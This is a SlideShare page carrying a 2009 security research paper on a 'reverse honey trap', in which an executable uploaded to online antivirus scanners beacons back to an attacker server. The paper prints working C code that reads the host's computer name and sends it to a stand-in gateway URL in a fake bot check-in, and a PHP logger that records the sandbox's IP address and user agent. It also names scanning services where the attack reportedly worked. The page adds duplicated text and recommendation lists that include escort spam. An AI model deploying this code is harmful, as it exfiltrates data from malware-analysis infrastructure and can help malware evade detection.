SlideShare a Scribd company logo

Reverse Honey Traps - Beating Online Anti-virus Engine in its Own Game by Rohit Bansal

n|u - The Open Security Community
n|u - The Open Security Community

Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works.

Technology
1 of 8
Download to read offline
SCHAP SECURITY Reverse Honey Trap Striking Deep inside Online Web Antivirus Engines and Analyzers Security Researchers - Aditya K Sood (0kn0ck) / Rohit Bansal (RB 1337) 11/22/2009 SCHAP Security: http://www.schap.org Version (0.1)
Disclaimer There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. No part of this publication may be reproduced, stored in a retrieval system or transmitted, in any form or by any means, photocopying, recording or otherwise, without prior written consent of SCHAP. While every precaution has been taken in the preparation of this publication, this publication and features described herein are subject to change without notice. 2|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Overview Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works. The baseline revolves around the ingrained possibility to design a honey trap which can steal or extract the information from the online placed antivirus servers. This even includes the antivirus servers which are used for scanning purposes. There can be three cases: 1. Interface servers are termed as front end servers for uploading the executables. 2. Dynamic servers are termed as back end servers for direct scanning of the executable. 3. Third party servers which are used for scanning of an executable at other domains. The concept deals with designing a reverse honey trap through which information from anti virus scanning engines can be traced by uploading a packed executable. Once it is uploaded on the server it is unpacked and scanned in an inline manner to trace the objects residing in it. The infected traced object points to the attacker controlled domain and the code becomes inline thereby extracting critical information from antivirus servers. 3|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Base Concept: Online antivirus engines are interoperable in nature. There are number of primary or secondary servers which are working collaboratively against a particular task. The only difference lies in their functionality. The base logic projects that viruses cannot hide within compressed modules because major anti-virus software support scanning inside the packed modules. This clearly indicates that every single object present inside the executable whether it is packed or not is definitely traced by the online antivirus engine. This process is termed as “Inline Scanning”. Our technique utilizes this efficient functionality of antivirus engines to steal information from the servers which are doing analysis and third party code scanning on the executable. Primarily executables are packed with some kind of object code which is linked to third party infected servers. Possible inclusion of third party code from the remote resource results in the infection of victim machine. This process is almost optimized for malware analysis as every scanned object is handled in a controlled environment. The databases are updated with analysis that are performed on the executables which are the source of infection or poses some kind of threat to the system. While scanning the inbuilt objects packed with the executable, all kinds of third party links are made active to analyze the behavior in a controlled environment. This process is carried out to scrutinize the resultant impact on the system thereby keeping an eye on the modules involved in it. Our research has shown the possibility of stealing antivirus server information with the same concept which enables us to gather sensitive information automatically. These servers can be secondary servers or virtual machines which are configured for scanning malwares and other heuristic based functionalities. It is possible to upload a custom designed executable that is packed with object code. If an executable is allowed to be scanned by the antivirus engine then it possible to steal the base information from the server without any difficulties. The scanned object which has a URL pointed to attacker controlled server executes the raw code present on the server in the context of the antivirus server which produces the trick. It is considered to be as one of the ingrained functionality of online antivirus scanner but it results in different output which is very critical for the running online antivirus server infrastructure. The code requires a PHP snippet and an executable which can perform the socket related operations. A very basic demo has been structure which can be tested. The sample executable code #include <windows.h> #include <wininet.h> #include <stdio.h> char szUrl[] = "http://www.server.com/gateway.php?"; // Can use your own custom server void StartBot() { char szBuffer[512],szCompname[128]; DWORD dwCount = 128; HINTERNET iHandle; GetComputerName(szCompname, &dwCount); /* sending some fake info to the logging site so it looks like a bot reporting in and downloading a file and so we get the computer name */ 4|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
_snprintf(szBuffer, sizeof(szBuffer) - 1,"%sbot=%s&uniquebotid=%d&botversion=11&get=install%d.exe", szUrl, szCompname,GetTickCount(),rand()%1000+100); iHandle = InternetOpen("Example Ser Ver 1.1", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL); if(iHandle) { InternetOpenUrl(iHandle, szBuffer, NULL, 0, INTERNET_FLAG_RELOAD, 0); } InternetCloseHandle(iHandle); } int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrvInst,LPSTR lpCmdLine, int nvis) { srand(GetTickCount()); StartBot(); return 0; } The resultant output can be set as PHP code. For the above mentioned code and demo, the PHP code is structured as below: <?php /* It's just a concept of a AV/Sandbox Tracker Better use a database for storing the info rather than a text file */ date_default_timezone_set("America/New_York"); $h = fopen('antivirus.txt', 'a'); $a = $_GET['bot']; $b = getenv("REMOTE_ADDR"); $c = gethostbyaddr($b); $d = $_SERVER["HTTP_USER_AGENT"]; $e = date("d/m/Y H:i:s"); $data = " ------------------------------------------------------------n ttt$an ------------------------------------------------------------n Date: $e IP: $b HOST: $c USER-AGENT: $d ------------------------------------------------------------nn"; fwrite($h, $data); fclose($h); echo base64_encode("EXAMPLE_SER")."<br>^^^^err^^^^<br>file not found: ".$_GET['get']."<br>"; ?> The code presented above shows the functionality of this concept. 5|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Work Flow Model: The work flow model is presented below. A snapshot of the information extracted based on the above mentioned attack. 6|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
This attack work successfully against: 1 NoVirusThanks – http://www.novirusthanks.org NoVirusThanks is another free online virus scan service that scans suspicious files for possible presence of virus, worms, Trojans and any other kind of malware using multiple Anti-Virus engines, consisting of 24 engines. 2. Virustotal – http://www.virustotal.com VirusTotal is free online virus scan service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans and all kinds of malware detected by antivirus engines consisting of a huge number of 37 engines! 3 Filter Bit – http://www.filterbit.com/index.cgi 7|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Filterbit is a free online virus scan service where you can upload files for scanning, analysis and identification by multiple antivirus engines, consisting of 8 engines. References: [1] http://www.opsec.com/solutions/partners/downloads/Kaspersky_EngineTech_WP.pdf [2] http://hubpages.com/hub/Top-Free-Online-Virus-Scan [3] http://www.malwarehelp.org/online_anti_malware_scanners_single_file.html [4] http://www.securityfocus.com/infocus/1650 8|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines

Recommended

Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singaporen|u - The Open Security Community
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primern|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primaryn|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3n|u - The Open Security Community
 

Recommended

Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singaporen|u - The Open Security Community
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primern|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primaryn|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLFn|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teamingn|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logsn|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodann|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Cloud security n|u - The Open Security Community
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windowsn|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usagen|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Processn|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Securityn|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacksn|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackersn|u - The Open Security Community
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentestingn|u - The Open Security Community
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904n|u - The Open Security Community
 
XXE
XXEXXE
XXEn|u - The Open Security Community
 
News Bytes
News BytesNews Bytes
News Bytesn|u - The Open Security Community
 
Introduction to YARA rules
Introduction to YARA rulesIntroduction to YARA rules
Introduction to YARA rulesn|u - The Open Security Community
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
Social engineering
Social engineeringSocial engineering
Social engineeringn|u - The Open Security Community
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 

More Related Content

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904
 
XXE
XXEXXE
XXE
 
News Bytes
News BytesNews Bytes
News Bytes
 
Introduction to YARA rules
Introduction to YARA rulesIntroduction to YARA rules
Introduction to YARA rules
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
Social engineering
Social engineeringSocial engineering
Social engineering
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 

Reverse Honey Traps - Beating Online Anti-virus Engine in its Own Game by Rohit Bansal

  • 1. SCHAP SECURITY Reverse Honey Trap Striking Deep inside Online Web Antivirus Engines and Analyzers Security Researchers - Aditya K Sood (0kn0ck) / Rohit Bansal (RB 1337) 11/22/2009 SCHAP Security: http://www.schap.org Version (0.1)
  • 2. Disclaimer There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. No part of this publication may be reproduced, stored in a retrieval system or transmitted, in any form or by any means, photocopying, recording or otherwise, without prior written consent of SCHAP. While every precaution has been taken in the preparation of this publication, this publication and features described herein are subject to change without notice. 2|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 3. Overview Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works. The baseline revolves around the ingrained possibility to design a honey trap which can steal or extract the information from the online placed antivirus servers. This even includes the antivirus servers which are used for scanning purposes. There can be three cases: 1. Interface servers are termed as front end servers for uploading the executables. 2. Dynamic servers are termed as back end servers for direct scanning of the executable. 3. Third party servers which are used for scanning of an executable at other domains. The concept deals with designing a reverse honey trap through which information from anti virus scanning engines can be traced by uploading a packed executable. Once it is uploaded on the server it is unpacked and scanned in an inline manner to trace the objects residing in it. The infected traced object points to the attacker controlled domain and the code becomes inline thereby extracting critical information from antivirus servers. 3|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 4. Base Concept: Online antivirus engines are interoperable in nature. There are number of primary or secondary servers which are working collaboratively against a particular task. The only difference lies in their functionality. The base logic projects that viruses cannot hide within compressed modules because major anti-virus software support scanning inside the packed modules. This clearly indicates that every single object present inside the executable whether it is packed or not is definitely traced by the online antivirus engine. This process is termed as “Inline Scanning”. Our technique utilizes this efficient functionality of antivirus engines to steal information from the servers which are doing analysis and third party code scanning on the executable. Primarily executables are packed with some kind of object code which is linked to third party infected servers. Possible inclusion of third party code from the remote resource results in the infection of victim machine. This process is almost optimized for malware analysis as every scanned object is handled in a controlled environment. The databases are updated with analysis that are performed on the executables which are the source of infection or poses some kind of threat to the system. While scanning the inbuilt objects packed with the executable, all kinds of third party links are made active to analyze the behavior in a controlled environment. This process is carried out to scrutinize the resultant impact on the system thereby keeping an eye on the modules involved in it. Our research has shown the possibility of stealing antivirus server information with the same concept which enables us to gather sensitive information automatically. These servers can be secondary servers or virtual machines which are configured for scanning malwares and other heuristic based functionalities. It is possible to upload a custom designed executable that is packed with object code. If an executable is allowed to be scanned by the antivirus engine then it possible to steal the base information from the server without any difficulties. The scanned object which has a URL pointed to attacker controlled server executes the raw code present on the server in the context of the antivirus server which produces the trick. It is considered to be as one of the ingrained functionality of online antivirus scanner but it results in different output which is very critical for the running online antivirus server infrastructure. The code requires a PHP snippet and an executable which can perform the socket related operations. A very basic demo has been structure which can be tested. The sample executable code #include <windows.h> #include <wininet.h> #include <stdio.h> char szUrl[] = "http://www.server.com/gateway.php?"; // Can use your own custom server void StartBot() { char szBuffer[512],szCompname[128]; DWORD dwCount = 128; HINTERNET iHandle; GetComputerName(szCompname, &dwCount); /* sending some fake info to the logging site so it looks like a bot reporting in and downloading a file and so we get the computer name */ 4|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 5. _snprintf(szBuffer, sizeof(szBuffer) - 1,"%sbot=%s&uniquebotid=%d&botversion=11&get=install%d.exe", szUrl, szCompname,GetTickCount(),rand()%1000+100); iHandle = InternetOpen("Example Ser Ver 1.1", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL); if(iHandle) { InternetOpenUrl(iHandle, szBuffer, NULL, 0, INTERNET_FLAG_RELOAD, 0); } InternetCloseHandle(iHandle); } int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrvInst,LPSTR lpCmdLine, int nvis) { srand(GetTickCount()); StartBot(); return 0; } The resultant output can be set as PHP code. For the above mentioned code and demo, the PHP code is structured as below: <?php /* It's just a concept of a AV/Sandbox Tracker Better use a database for storing the info rather than a text file */ date_default_timezone_set("America/New_York"); $h = fopen('antivirus.txt', 'a'); $a = $_GET['bot']; $b = getenv("REMOTE_ADDR"); $c = gethostbyaddr($b); $d = $_SERVER["HTTP_USER_AGENT"]; $e = date("d/m/Y H:i:s"); $data = " ------------------------------------------------------------n ttt$an ------------------------------------------------------------n Date: $e IP: $b HOST: $c USER-AGENT: $d ------------------------------------------------------------nn"; fwrite($h, $data); fclose($h); echo base64_encode("EXAMPLE_SER")."<br>^^^^err^^^^<br>file not found: ".$_GET['get']."<br>"; ?> The code presented above shows the functionality of this concept. 5|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 6. Work Flow Model: The work flow model is presented below. A snapshot of the information extracted based on the above mentioned attack. 6|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 7. This attack work successfully against: 1 NoVirusThanks – http://www.novirusthanks.org NoVirusThanks is another free online virus scan service that scans suspicious files for possible presence of virus, worms, Trojans and any other kind of malware using multiple Anti-Virus engines, consisting of 24 engines. 2. Virustotal – http://www.virustotal.com VirusTotal is free online virus scan service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans and all kinds of malware detected by antivirus engines consisting of a huge number of 37 engines! 3 Filter Bit – http://www.filterbit.com/index.cgi 7|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 8. Filterbit is a free online virus scan service where you can upload files for scanning, analysis and identification by multiple antivirus engines, consisting of 8 engines. References: [1] http://www.opsec.com/solutions/partners/downloads/Kaspersky_EngineTech_WP.pdf [2] http://hubpages.com/hub/Top-Free-Online-Virus-Scan [3] http://www.malwarehelp.org/online_anti_malware_scanners_single_file.html [4] http://www.securityfocus.com/infocus/1650 8|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines